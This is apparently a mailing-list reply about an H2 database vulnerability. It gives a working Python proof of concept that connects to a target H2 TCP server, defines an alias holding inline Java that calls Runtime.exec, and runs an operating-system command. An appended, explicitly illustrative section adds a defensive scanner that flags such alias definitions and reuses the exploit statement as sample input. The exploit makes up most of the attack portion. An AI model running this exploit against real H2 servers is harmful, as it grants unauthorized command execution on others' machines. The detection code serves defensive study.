Here's a small Python POC:

- Windows-based (feel free to tweak for *nix)
- Requires jaydebeapi (run "pip install jaydebeapi")
- Assumes javac is in the system path (so does the original POC)

import jaydebeapi
SERVER = "SERVER_TO_EXPLOIT"
conn = jaydebeapi.connect("org.h2.Driver",
"jdbc:h2:tcp://%s:9092/C:\\Windows\\Temp\\exploit" % (SERVER),["sa", ""], 
"./h2-1.4.196.jar",)
curs = conn.cursor()

curs.execute('DROP ALIAS IF EXISTS EXECVE')
curs.execute('CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);  }$$;')

curs.execute("CALL EXECVE('c:\\windows\\system32\\msg.exe * \"Exploited!\"')")


On Thursday, November 1, 2018 at 1:02:31 PM UTC-4, Noel Grandin wrote:
>
> where is the JDBC version of the exploit?
>

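A defender's counterpart to the POC above, added here as an example and not part of the original message or the H2 project: it scans SQL statements for `CREATE ALIAS ... AS` definitions that carry inline Java source, and raises the severity when that source starts an OS process. The function names, the process-API token list and the sample statements are assumptions constructed for illustration.

```python
import re

# Matches H2 "CREATE ALIAS <name> ... AS <source>" where the source is a
# $$...$$ block or a single-quoted string (inline Java compiled by the server).
ALIAS_INLINE = re.compile(
    r"CREATE\s+ALIAS\s+(?:IF\s+NOT\s+EXISTS\s+)?(?P<name>[\w\".]+)"
    r"(?:\s+(?:DETERMINISTIC|NOBUFFER))*\s+AS\s+"
    r"(?P<src>\$\$.*?\$\$|'(?:[^']|'')*')",
    re.IGNORECASE | re.DOTALL,
)
# Java APIs that start an OS process; assumption: a short illustrative list.
PROCESS_APIS = re.compile(r"Runtime\s*\.\s*getRuntime|ProcessBuilder", re.I)

def classify(statement):
    """Return (severity, alias_name) for one SQL statement, or None."""
    m = ALIAS_INLINE.search(statement)
    if not m:
        return None
    severity = "high" if PROCESS_APIS.search(m.group("src")) else "review"
    return severity, m.group("name").strip('"').upper()

def scan(statements):
    """Yield (index, severity, alias_name) for every flagged statement."""
    for i, stmt in enumerate(statements):
        hit = classify(stmt)
        if hit:
            yield (i, *hit)

# Constructed sample statements, as they might appear in a SQL audit trail.
SAMPLE = [
    "SELECT * FROM INFORMATION_SCHEMA.USERS",
    "DROP ALIAS IF EXISTS EXECVE",
    "CREATE ALIAS EXECVE AS $$ void execve(String cmd) throws "
    "java.io.IOException { Runtime.getRuntime().exec(cmd);  }$$;",
    "create alias if not exists next_prime as "
    "'String f(String v) { return new java.math.BigInteger(v)"
    ".nextProbablePrime().toString(); }'",
    'CREATE ALIAS MD5 FOR "org.example.Hash.md5"',
]

if __name__ == "__main__":
    for idx, sev, name in scan(SAMPLE):
        print(f"statement {idx}: alias {name} defined from inline Java [{sev}]")
```

Aliases bound with `FOR` to an existing class are deliberately not flagged here, since they do not compile caller-supplied source.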